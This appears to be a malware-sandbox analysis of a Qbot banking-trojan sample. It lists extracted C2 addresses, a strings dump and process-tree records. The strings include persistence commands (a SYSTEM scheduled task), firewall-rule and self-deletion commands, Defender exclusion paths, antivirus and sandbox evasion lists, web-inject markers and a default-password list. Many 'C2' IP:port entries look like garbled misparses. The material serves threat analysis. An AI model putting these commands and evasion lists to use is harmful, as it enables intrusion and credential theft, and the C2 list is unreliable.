103.32.61.153:2695

103.40.97.122:36096

104.105.107.108:28014

104.39.44.113:24420

104.91.161.134:131

104.99.115.113:43085

105.101.181.79:26003

105.108.101.40:50243

105.110.103.46:26226

105.110.146.119:32

105.111.40.88:10507

105.112.119.98:28260

105.116.101.105:29796

105.116.97.192:45316

105.172.18.207:45277

105.43.61.32:13437

105.45.51.93:8286

105.60.66.88:91

105.61.32.48:5642

105.97.97.122:24946

106.101.110.7:4

106.103.100.30:11120

106.29.43.30:18801

106.5.65.29:27165

107.113.97.44:8292

107.120.100.61:8226

107.174.241.70:1590

108.101.0.0:11379

108.101.101.112:10289

108.115.101.32:32826

108.211.26.0:0

108.83.33.20:143

108.99.123.105:2261

109.106.114.100:215

109.112.162.139:29224

109.30.32.38:788

109.9.14.149:5353

109.97.119.104:28527

11.120.14.44:8243

11.178.15.192:9455

110.100.40.250:6151

110.100.64.84:10939

110.119.111.61:576

110.206.103.35:58239

110.234.26.144:39965

110.32.107.115:24439

110.60.60.22:41216

110.93.162.108:10413

111.103.114.97:27972

111.110.116.105:28277

111.116.111.116:31088

111.227.232.224:11058

112.100.105.32:15842

112.101.110.40:8775

112.102.204.101:28543

112.108.105.99:24898

112.111.110.115:25940

112.56.11.60:58129

113.114.115.116:30070

113.119.169.34:41175

113.26.105.114:24577

114.115.40.41:8252

115.0.142.162:22645

115.100.112.99:2560

115.102.118.100:29952

115.108.112.100:27511

115.116.114.133:99

115.116.43.201:19309

115.203.51.72:512

115.41.59.95:63685

115.47.48.120:12592

116.100.61.173:7252

116.106.98.102:30510

116.112.116.119:27248

116.116.112.82:25969

116.117.115.47:12848

116.14.66.72:43041

116.221.27.57:28065

116.95.121.99:256

117.108.95.109:59905

117.114.110.197:53251

117.118.138.11:25132

117.99.41.32:31501

118.105.99.101:8747

118.92.43.188:192

119.120.121.249:322

119.32.2.0:22605

119.32.34.120:28012

119.40.0.0:31078

119.40.49.53:12600

12.20.106.32:11091

120.112.102.104:27751

120.119.102.64:11597

120.196.38.65:12332

120.44.32.111:30830

121.106.88.165:54343

121.107.107.119:10619

121.2.48.10:39524

121.99.118.103:25640

122.167.144.206:18491

122.99.95.105:31089

123.137.157.86:52405

123.224.75.22:15205

123.76.8.50:10

123.97.100.114:25713

125.99.97.116:8454

126.1.128.78:26990

126.102.48.92:8738

126.116.56.57:14644

128.165.121.41:8286

128.199.85.84:11569

128.80.136.32:20577

129.49.56.50:240

13.10.198.177:11622

13.141.195.18:10555

13.40.245.56:56678

130.116.41.32:19301

133.137.174.151:41363

133.60.75.151:55067

134.226.41.246:17779

137.48.14.11:15648

139.177.219.213:1040

139.56.202.63:49701

139.94.205.202:8229

14.124.94.67:28528

14.157.216.67:144

140.151.131.200:35074

141.9.125.4:28788

143.133.77.169:51090

143.254.123.226:34681

145.75.34.211:10076

145.99.142.106:41179

147.117.150.133:889

147.84.82.32:23586

148.164.36.106:8353

148.253.255.113:26699

149.185.175.179:27306

149.226.119.1:36434

15.100.98.107:55946

15.50.15.112:29306

152.254.116.116:27493

154.71.3.1:24722

155.10.116.102:26921

156.18.117.121:29795

158.146.33.40:7168

159.135.128.20:25718

159.151.110.44:8303

16.0.20.99:26740

16.166.232.42:8235

16.28.65.29:5748

160.0.18.51:11313

160.0.44.49:12592

161.18.14.0:6022

163.123.115.103:214

163.173.194.80:2316

164.0.5.45:25185

165.8.40.105:8235

168.248.91.34:9984

168.37.95.221:17137

17.142.5.38:13113

176.18.115.111:29453

176.59.32.121:4283

177.144.250.8:13912

177.195.9.60:60436

177.88.97.76:61440

178.0.111.40:28518

179.40.49.54:10540

179.85.11.205:19745

18.97.44.32:13609

182.101.101.95:28535

186.40.126.98:47134

187.130.103.101:29791

188.68.23.13:11296

192.16.51.93:11296

192.76.43.50:10808

194.16.227.17:15317

195.31.53.49:13513

196.35.143.48:16478

196.43.61.58:17822

197.216.244.91:10978

199.141.10.18:22896

2.1.104.37:13345

2.185.116.105:37125

20.1.44.97:30821

20.13.41.41:8229

20.45.56.8:12596

200.61.43.34:8239

201.98.50.145:8761

202.248.95.233:21158

203.20.112.44:64780

204.161.37.9:12742

204.34.49.49:12345

207.42.1.45:28517

21.58.37.138:32802

213.44.66.217:39486

214.222.99.148:43377

214.87.83.99:29289

215.176.46.69:28278

215.36.112.122:26215

219.59.152.61:40320

220.91.80.69:12915

220.98.242.97:15136

224.160.220.59:37437

224.21.52.32:31777

226.33.15.44:8293

226.93.172.88:47739

227.81.32.165:8232

228.110.114.116:28772

228.5.105.95:12848

228.9.96.69:27437

23.140.0.95:28267

24.32.121.32:49258

240.211.108.161:44575

248.135.202.74:18944

25.95.160.226:26222

250.37.10.100:55040

252.0.45.115:29793

252.213.8.28:23124

27.13.10.150:2823

28.102.122.197:17218

28.122.115.114:68

29.240.35.49:13856

29.54.44.49:13617

29.55.126.172:12

3.11.65.116:10280

32.101.116.67:35028

32.106.32.60:8245

32.119.104.105:22

32.119.115.105:25622

32.125.120.0:2418

32.134.12.133:9839

32.19.46.108:25966

32.214.46.115:49924

32.24.15.95:11069

32.3.21.189:17505

32.34.157.3:9556

32.34.34.212:36668

32.34.43.167:11042

32.34.43.64:456

32.47.32.50:49802

32.47.68.101:27749

32.47.70.0:2166

32.47.84.78:8226

32.48.197.18:12745

32.49.97.113:27247

32.60.232.115:25972

32.61.32.105:25716

32.62.32.34:11144

32.71.91.8:5296

32.97.108.109:25445

33.101.46.38:18576

33.20.26.215:256

33.4.128.208:8752

33.4.92.45:12813

33.80.44.153:34678

34.1.50.64:13173

34.131.113.157:26209

34.134.57.163:22061

34.43.0.24:55688

34.43.10.180:10283

34.43.34.116:28730

34.44.74.129:47657

34.77.83.88:19788

34.92.34.32:12115

34.92.92.34:11044

35.18.77.111:26434

35.192.1.0:35442

35.24.99.34:7760

35.33.183.152:2313

36.156.141.19:54041

37.49.0.0:11314

38.14.107.183:9792

38.16.16.59:15377

38.3.95.49:11898

38.49.184.0:22909

38.55.38.51:50754

38.62.251.137:50043

38.97.32.61:8282

39.150.226.199:16

4.192.82.32:26995

4.23.56.23:12336

4.99.101.108:34594

40.101.41.208:907

40.105.107.100:29030

40.122.110.100:28023

40.125.32.171:34418

40.196.10.246:2627

40.34.5.0:16708

40.34.80.114:28515

40.51.49.45:63493

40.97.227.209:10072

40.98.32.38:45128

41.18.63.232:9782

41.189.46.2:18041

41.29.32.32:384

42.28.122.29:34780

42.32.141.42:13106

42.32.56.80:10313

42.40.44.156:58329

42.47.44.32:10023

43.0.43.46:17784

43.117.120.106:27743

43.206.43.83:29810

43.253.170.224:15148

43.34.115.107:29592

43.34.49.50:13108

43.43.88.152:12297

43.61.32.49:13952

43.64.43.34:11892

44.118.11.42:24617

44.128.142.21:9818

44.135.97.149:11136

44.173.204.227:54230

44.32.101.110:26726

44.32.101.44:8292

44.32.121.99:26977

44.32.45.24:13356

44.49.50.192:62054

44.49.53.48:11314

44.50.53.51:11313

45.106.0.107:3954

45.132.58.0:41624

45.46.114.101:28780

46.112.104.112:44115

46.112.117.115:26765

46.173.64.213:55287

46.44.32.50:12565

46.97.112.112:27769

47.100.60.113:17249

48.120.70.70:10556

48.236.3.7:25328

48.32.63.32:22334

48.41.123.9:3338

48.42.217.138:53504

48.44.52.48:24757

48.93.44.32:29560

48.98.97.173:10292

49.198.24.156:13070

49.29.101.100:31093

49.42.182.0:1354

49.44.0.4:12600

49.48.57.44:12601

49.52.11.0:12332

49.55.56.44:32

5.10.93.62:15922

5.172.44.46:25976

5.182.219.119:23401

5.225.40.28:16135

5.28.44.49:14191

5.30.58.52:2288

50.44.49.49:518

50.44.76.204:5655

50.48.56.51:13363

50.49.54.44:12596

50.49.96.97:14390

50.50.128.55:174

50.50.51.73:12593

51.110.41.196:45487

51.112.103.119:26995

51.44.49.53:14636

51.50.41.120:62721

52.135.102.23:22854

52.32.41.46:29807

52.34.48.0:48574

52.44.50.53:11313

53.45.53.80:222

53.48.48.50:13369

53.51.226.98:8286

53.54.55.56:14689

54.100.107.97:23816

54.33.61.49:13312

54.38.32.48:30790

55.139.66.201:21248

55.51.51.56:14137

55.63.157.93:10062

56.0.124.61:8241

56.226.33.182:3932

56.57.11.16:14135

57.44.128.32:12849

57.44.55.35:12592

57.45.49.21:19020

57.74.53.44:12597

58.52.48.44:3500

59.0.0.21:30305

59.121.11.145:55591

59.205.100.87:33536

59.224.135.33:25121

59.32.43.43:26912

6.0.61.32:28261

6.160.85.13:2569

60.194.175.166:62729

60.199.234.42:54224

60.29.42.91:8222

60.88.221.16:11034

61.113.106.101:12038

61.254.88.89:3584

61.32.39.92:30768

61.32.4.215:19

61.32.40.0:7713

61.32.48.120:13361

61.32.48.59:2304

61.39.169.93:13620

61.44.75.21:44645

62.50.48.44:14358

62.52.241.67:13353

62.62.40.51:12845

64.101.99.104:28448

64.196.115.108:26979

64.42.111.120:26222

64.86.51.50:29548

65.114.114.97:31016

66.46.83.116:29285

66.9.126.174:53406

67.103.40.32:41157

67.114.101.97:2704

67.134.131.3:10337

67.32.79.78:17221

67.40.105.99:24504

67.68.69.70:0

69.76.32.92:8741

7.0.38.105:27763

7.50.9.24:59986

70.114.111.109:7195

70.9.212.20:33504

71.128.15.22:7981

71.168.78.8:16605

71.203.44.25:32947

73.212.113.42:8950

73.74.75.76:19790

76.79.56.193:45358

77.0.0.92:29800

77.105.110.117:30241

77.51.2.20:8775

78.129.108.113:26993

78.90.90.165:19791

79.4.40.100:29795

8.128.18.119:31340

80.111.71.33:29545

80.121.124.40:27396

80.182.166.55:41137

80.33.45.56:13101

80.37.11.172:63660

81.82.83.84:21846

82.114.120.105:29044

82.117.110.40:36908

82.16.46.217:135

82.67.25.110:30060

82.75.101.68:30726

82.85.80.192:29036

83.0.56.51:11314

83.0.83.79:11576

83.101.5.8:29302

83.104.101.108:27694

84.105.22.30:28005

84.29.34.128:7806

85.76.76.24:60028

86.1.52.48:12343

86.120.112.99:26404

87.88.84.90:0

88.0.111.116:28788

88.143.97.28:12316

88.222.78.32:31818

88.232.33.214:15100

9.102.0.128:11054

9.105.102.32:10278

9.13.10.9:2935

9.25.237.32:15392

9.28.205.0:19567

9.54.93.44:8241

9.97.61.226:15136

9.98.66.12:29285

90.61.107.110:0

91.105.93.177:14947

91.105.93.34:129

91.40.108.5:1964

91.49.55.51:12853

91.50.93.126:10767

92.215.14.128:1822

92.39.32.43:8288

92.92.34.226:12141

93.133.18.254:201

93.250.67.134:42

93.41.141.112:11290

93.61.32.77:24948

94.67.242.24:16594

95.0.100.101:27680

95.100.99.115:30820

95.111.108.11:35487

95.32.94.86:3775

96.213.41.32:26209

96.56.53.57:49928

96.84.84.80:8837

97.101.109.120:10296

97.106.118.107:9799

97.109.101.59:1359

97.110.100.111:27944

97.118.101.84:28486

97.39.41.218:56311

98.101.105.121:28791

98.101.32.14:10528

98.104.106.119:41608

98.111.82.212:55257

98.118.98.17:29037

98.122.97.40:31090

98.26.207.161:17098

98.41.59.77:52547

98.44.108.44:34242

98.45.111.40:12481

98.75.128.26:58194

99.104.97.114:17263

99.114.111.115:28518

99.114.118.37:25193

99.152.12.156:34915

99.73.71.122:25951

99.80.72.19:11662

SaltjHxastDcds)oMc=jvh7wdUhxcsdt2

Strings (433)/F

/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"

/ru ""

[begin]

[end]

cookie=[%s]

data=[%s]

exe=[%s] cmdline=[%s] pid=[%u] username=[%s]

ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]

host=[%s:%u] user=[%s] pass=[%s]

referer=[%s]

url=[%s]

url=[%s] data=[%s]

url=[%s] lb=[%s] data=[%s]

url=[%s] user=[%s] pass=[%s]

"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u

"%s\system32\schtasks.exe" /DELETE /F /TN %s

"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S

%%%BOT_NICK%%%

%02u.%02u.%02u-%02u/%02u/%04u

%BOTID%

%BOT_COMPUTERNAME%

%BOT_MACHINE_UUID%

%BOT_USERDOMAIN%

%BOT_USERNAME%

%BOT_VENDOR_ID%

%ProgramFiles%\Internet Explorer\iexplore.exe

%ProgramFiles(x86)%\Internet Explorer\iexplore.exe

%SystemRoot%\SysWOW64\explorer.exe

%SystemRoot%\SysWOW64\mobsync.exe

%SystemRoot%\System32\mobsync.exe

%SystemRoot%\explorer.exe

%s "$windowsupdate = \"%s\"; & $windowsupdate"

%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d

%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"

%s%s/dupinst.php?n=%s&bg=%s&r=%u

%s\%s.vbs

%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"

%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"

%u.%s.%s.%08x

*/*

.cfg

.dat

.dll

.exe

.lnk

/bot_serv

/t3

000

1234567890

23.49.13.33:7000

307

308

309

310

311

ADMIN$

ALLUSERSPROFILE

AdjustTokenPrivileges

Administrator

AllocateAndInitializeSid

AvastSvc.exe

ByteFence.exe

C:\\INTERNAL\\__empty

CWSandbox

CertAddCRLContextToStore

CertAddCTLContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCreateCertificateChainEngine

CertDuplicateCRLContext

CertEnumCertificatesInStore

CertEnumSystemStore

CertFreeCRLContext

CertFreeCertificateChain

CertFreeCertificateChainEngine

CertFreeCertificateContext

CertGetCRLContextProperty

CertGetCertificateChain

CertGetEnhancedKeyUsage

CertGetNameStringW

CertOpenStore

CertSetCertificateContextProperty

CloseHandle

CloseServiceHandle

Content-Type: application/x-www-form-urlencoded

CreateDirectoryA

CreateFileA

CreateFileW

CreateProcessA

CreateProcessW

CreateRemoteThread

CreateServiceW

CreateThread

CreateToolhelp32Snapshot

CreateWindowExA

CredEnumerateA

CredFree

CryptAcquireCertificatePrivateKey

CryptEnumOIDInfo

CryptFindOIDInfo

CryptUnprotectData

DefWindowProcA

DeleteFileA

DeleteService

DeleteServiceW

DeleteUrlCacheEntryW

DestroyWindow

DispatchMessageA

DnsQuery_A

DnsQuery_W

DynamicCodePolicy

ExpandEnvironmentStringsA

FindClose

FindFirstFileA

FindNextFileA

FindWindowA

FreeSid

FtpDeleteFileA

FtpGetFileA

FtpOpenFileA

GenuineIntel

GetClipboardData

GetCurrentDirectoryA

GetCurrentThreadId

GetForegroundWindow

GetMessageA

GetMessageW

GetModuleFileNameA

GetModuleHandleA

GetProcAddress

GetUrlCacheEntryInfoW

GetVolumeInformationA

Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}

HOURLY /mo 5

HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoW

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestW

IPC$

Initializing database...

InterlockedCompareExchange

InternetCloseHandle

InternetConnectA

InternetCrackUrlA

InternetGetCookieA

InternetGetCookieExA

InternetGetLastResponseInfoA

InternetOpenA

InternetOpenUrlA

InternetQueryDataAvailable

InternetQueryOptionA

InternetQueryOptionW

InternetReadFile

InternetReadFileExA

InternetSetOptionA

InternetSetStatusCallback

InternetWriteFile

LdrGetProcedureAddress

LdrLoadDll

LoadLibraryA

LocalFree

LookupAccountSidA

LookupAccountSidW

MBAMService.exe

MessageBoxA

Microsoft

MicrosoftEdge.exe

Module32First

Module32Next

MoveFileA

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0

MsMpEng.exe

NAT-PMP %u tcp

NetApiBufferFree

NetGetDCName

NetShareEnum

NetUserEnum

NetWkstaGetInfo

NtAllocateVirtualMemory

NtClose

NtCreateSection

NtFreeVirtualMemory

NtGetContextThread

NtMapViewOfSection

NtProtectVirtualMemory

NtQueryInformationProcess

NtQueryVirtualMemory

NtReadVirtualMemory

NtSetContextThread

NtUnmapViewOfSection

NtWow64QueryInformationProcess64

NtWow64ReadVirtualMemory64

NtWriteVirtualMemory

ObtainUserAgentString

OpenProcess

OpenSCManagerW

OpenThread

PFXExportCertStore

PR_Close

PR_GetError

PR_GetNameForIdentity

PR_OpenTCPSocket

PR_Read

PR_SetError

PR_Write

PStoreCreateInstance

PeekMessageA

PeekMessageW

PostMessageA

PostQuitMessage

Process32First

Process32Next

ProfileImagePath

QEMU

QueryFullProcessImageNameW

Query_Main

RapportGP.DLL

ReadFile

ReadProcessMemory

Red Hat VirtIO

RegCloseKey

RegCreateKeyExA

RegDeleteValueA

RegEnumKeyExA

RegEnumValueA

RegOpenKeyExA

RegQueryInfoKeyA

RegQueryValueExA

RegSetValueExA

RegisterClassExA

RtlGetVersion

RtlNtStatusToDosError

RtlSetLastWin32Error

SAVAdminService.exe;SavService.exe

SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity

SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet

SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths

SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths

SOFTWARE\Microsoft\Windows Defender\SpyNet

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet

SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet

SbieDll.dll

Self test FAILED!!!

Self test OK.

SendMessageA

SetCurrentDirectoryA

SetEndOfFile

SetEntriesInAclA

SetFilePointer

SetLastError

SetNamedSecurityInfoA

ShellExecuteA

ShowWindow

SpyNetReporting

StackWalk64

StartServiceW

SubmitSamplesConsent

TranslateMessage

UnregisterClassA

UpdateWindow

VBoxGuest

VBoxVideo

VMAUDIO

VMware Accelerated

VMware Pointing

VMware Replay

VMware SCSI

VMware SVGA

VMware VMaudio

VMware Vista

VMware server memory

Virtual HD

VirtualAllocEx

VirtualFreeEx

VirtualProtect

VirtualProtectEx

WBJ_IGNORE

WEEKLY /D TUE,WED /ST 12:00:00

WNetAddConnection2W

WNetCancelConnection2W

WNetCloseEnum

WNetEnumResourceW

WNetOpenEnumW

WRSA.exe

WSAConnect

WSAGetLastError

WSASend

WSASetLastError

WTSEnumerateSessionsW

WTSFreeMemory

WTSQueryUserToken

WaitForSingleObject

Windows10 Edge HttpQueryInfo Bug!!!

WriteFile

WriteProcessMemory

ZwQueryInformationThread

ZwResumeThread

\sf2.dll

aabcdeefghiijklmnoopqrstuuvwxyyz

aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz

abc

abcdefghijklmnopqrstuvwxyz

administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator

advapi32.dll

ansfltr

application/x-shockwave-flash

artifact.exe

aswhooka.dll

aswhookx.dll

avcuf32.dll

avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe

avp.exe

bdagent.exe;vsserv.exe;vsservppl.exe

c:\hiberfil.sysss

cashmanagementconnectionstring

ccSvcHst.exe

chrome.dll

chrome_child.dll

cmd /c schtasks.exe /Query > "%s"

cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\"

cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"

cmd=1&msg=%s&ports=

connect

content.bigflimz.com

coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe

crypt32.dll

cryptui.dll

cscript.exe

data_after

data_before

data_end

data_inject

dbghelp.dll

dnsapi.dll

egui.exe;ekrn.exe

error res='%s' err=%d len=%u

exclude_url

explorer.exe

firefox.exe

fmon.exe

fshoster32.exe

https://

https://cdn.speedof.me/sample4096k.bin?r=0.%u

https://en.wikipedia.org/static/apple-touch/wikipedia.png

ignore_url

image/gif

image/jpeg

image/pjpeg

ivm-inject.dll

jHxastDcds)oMc=jvh7wdUhxcsdt2

kernel32.dll

mcshield.exe

metsvc-server.exe

mlwr_smpl

mpr.dll

netapi32.dll

netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes

netsh firewall set allowedprogram "%s" %s ENABLE

netteller.com

nspr4.dll

nss3.dll

ntdll.dll

pstorec.dll

qbot_conf_path='%S' username='%S'

qbot_run_mutex='%s' username='%S'

reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"

rsabase.dll

rsaenh.dll

sample

sbtisht

send

set_url

shell32.dll

siteadvisor.com;avgthreatlabs.com;safeweb.norton.com

srootkit

t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]

tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe

urlmon.dll

user32.dll

vSockets

vkise.exe;isesrv.exe;cmdagent.exe

vm3dmp

vmacthlp.exe

vmdebug

vmnat.exe

vmrawdsk

vmscsi

vmtoolsd.exe

vmx_svga

vmxnet

wbj.go

webinjects.cb

windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe

windump.exe

wininet.dll

wpcap.dll

wpl

wpq

ws2_32.dll

wtsapi32.dll

{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}

4312

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

4412

C:\Users\admin\AppData\Local\Temp\444444.png.exe /C

C:\Users\admin\AppData\Local\Temp\444444.png.exe

444444.png.exe

User:

admin

Company:

Microsoft C

Integrity Level:

MEDIUM

Description:

Macedo

Exit code:

Version:

6.5.1042

Modules

Images
c:\users\admin\appdata\local\temp\444444.png.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\ole32.dll

4844

"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\WINDOWS\System32\calc.exe" > "C:\Users\admin\AppData\Local\Temp\444444.png.exe"

C:\Windows\SysWOW64\cmd.exe

444444.png.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll

5808

C:\WINDOWS\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

fsoevv.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Explorer

Version:

10.0.19041.3758 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcp_win.dll

Qbot

(PID) Process(5808) explorer.exe

Botnetspx55

Campaign1579782661

Version324.8

C2 (576)0.0.10.65:25460

0.0.117.110:25460

0.0.169.49:14124

0.0.32.91:12600

0.0.99.111:28259

0.12.44.32:24873

0.128.16.59:32013

0.128.85.32:11570

0.153.233.120:26940

0.17.232.198:63477

0.180.114.119:25444

0.187.212.32:8752

0.195.97.95:29035

0.196.3.188:26989

0.2.64.159:8254

0.226.195.225:15923

0.26.109.109:24433

0.28.226.23:11891

0.40.17.170:10587

0.45.40.44:54318

0.48.49.53:19001

0.83.115.119:594

0.96.0.152:10299

1.0.111.110:28005

1.0.59.3:19887

1.154.8.101:28277

1.29.102.111:29216

1.60.32.43:18035

1.88.3.30:28778

10.125.13.10:29039

10.244.49.22:964

100.101.102.34:15136

100.101.65.116:10345

100.113.108.119:15648

100.121.122.119:29014

100.32.72.1:12131

100.44.32.108:26726

100.59.59.25:41472

100.61.3.144:36955

100.97.197.46:29793

101.0.105.47:10290

101.100.170.133:33045

101.109.40.39:1024

101.120.76.8:30817

101.122.99.40:29505

101.132.80.161:14352

101.168.251.193:46472

101.172.2.254:10049

101.202.154.21:12363

101.40.22.0:12124

101.88.79.98:27237

101.97.110.117:10394

102.106.154.16:37731

102.107.98.117:30823

102.108.111.111:568

102.108.41.123:40625

102.111.177.80:1359

102.92.114.92:28188

103.106.116.99:55809

103.126.27.147:2307

103.128.54.16:14133

103.32.61.153:2695

103.40.97.122:36096

104.105.107.108:28014

104.39.44.113:24420

104.91.161.134:131

104.99.115.113:43085

105.101.181.79:26003

105.108.101.40:50243

105.110.103.46:26226

105.110.146.119:32

105.111.40.88:10507

105.112.119.98:28260

105.116.101.105:29796

105.116.97.192:45316

105.172.18.207:45277

105.43.61.32:13437

105.45.51.93:8286

105.60.66.88:91

105.61.32.48:5642

105.97.97.122:24946

106.101.110.7:4

106.103.100.30:11120

106.29.43.30:18801

106.5.65.29:27165

107.113.97.44:8292

107.120.100.61:8226

107.174.241.70:1590

108.101.0.0:11379

108.101.101.112:10289

108.115.101.32:32826

108.211.26.0:0

108.83.33.20:143

108.99.123.105:2261

109.106.114.100:215

109.112.162.139:29224

109.30.32.38:788

109.9.14.149:5353

109.97.119.104:28527

11.120.14.44:8243

11.178.15.192:9455

110.100.40.250:6151

110.100.64.84:10939

110.119.111.61:576

110.206.103.35:58239

110.234.26.144:39965

110.32.107.115:24439

110.60.60.22:41216

110.93.162.108:10413

111.103.114.97:27972

111.110.116.105:28277

111.116.111.116:31088

111.227.232.224:11058

112.100.105.32:15842

112.101.110.40:8775

112.102.204.101:28543

112.108.105.99:24898

112.111.110.115:25940

112.56.11.60:58129

113.114.115.116:30070

113.119.169.34:41175

113.26.105.114:24577

114.115.40.41:8252

115.0.142.162:22645

115.100.112.99:2560

115.102.118.100:29952

115.108.112.100:27511

115.116.114.133:99

115.116.43.201:19309

115.203.51.72:512

115.41.59.95:63685

115.47.48.120:12592

116.100.61.173:7252

116.106.98.102:30510

116.112.116.119:27248

116.116.112.82:25969

116.117.115.47:12848

116.14.66.72:43041

116.221.27.57:28065

116.95.121.99:256

117.108.95.109:59905

117.114.110.197:53251

117.118.138.11:25132

117.99.41.32:31501

118.105.99.101:8747

118.92.43.188:192

119.120.121.249:322

119.32.2.0:22605

119.32.34.120:28012

119.40.0.0:31078

119.40.49.53:12600

12.20.106.32:11091

120.112.102.104:27751

120.119.102.64:11597

120.196.38.65:12332

120.44.32.111:30830

121.106.88.165:54343

121.107.107.119:10619

121.2.48.10:39524

121.99.118.103:25640

122.167.144.206:18491

122.99.95.105:31089

123.137.157.86:52405

123.224.75.22:15205

123.76.8.50:10

123.97.100.114:25713

125.99.97.116:8454

126.1.128.78:26990

126.102.48.92:8738

126.116.56.57:14644

128.165.121.41:8286

128.199.85.84:11569

128.80.136.32:20577

129.49.56.50:240

13.10.198.177:11622

13.141.195.18:10555

13.40.245.56:56678

130.116.41.32:19301

133.137.174.151:41363

133.60.75.151:55067

134.226.41.246:17779

137.48.14.11:15648

139.177.219.213:1040

139.56.202.63:49701

139.94.205.202:8229

14.124.94.67:28528

14.157.216.67:144

140.151.131.200:35074

141.9.125.4:28788

143.133.77.169:51090

143.254.123.226:34681

145.75.34.211:10076

145.99.142.106:41179

147.117.150.133:889

147.84.82.32:23586

148.164.36.106:8353

148.253.255.113:26699

149.185.175.179:27306

149.226.119.1:36434

15.100.98.107:55946

15.50.15.112:29306

152.254.116.116:27493

154.71.3.1:24722

155.10.116.102:26921

156.18.117.121:29795

158.146.33.40:7168

159.135.128.20:25718

159.151.110.44:8303

16.0.20.99:26740

16.166.232.42:8235

16.28.65.29:5748

160.0.18.51:11313

160.0.44.49:12592

161.18.14.0:6022

163.123.115.103:214

163.173.194.80:2316

164.0.5.45:25185

165.8.40.105:8235

168.248.91.34:9984

168.37.95.221:17137

17.142.5.38:13113

176.18.115.111:29453

176.59.32.121:4283

177.144.250.8:13912

177.195.9.60:60436

177.88.97.76:61440

178.0.111.40:28518

179.40.49.54:10540

179.85.11.205:19745

18.97.44.32:13609

182.101.101.95:28535

186.40.126.98:47134

187.130.103.101:29791

188.68.23.13:11296

192.16.51.93:11296

192.76.43.50:10808

194.16.227.17:15317

195.31.53.49:13513

196.35.143.48:16478

196.43.61.58:17822

197.216.244.91:10978

199.141.10.18:22896

2.1.104.37:13345

2.185.116.105:37125

20.1.44.97:30821

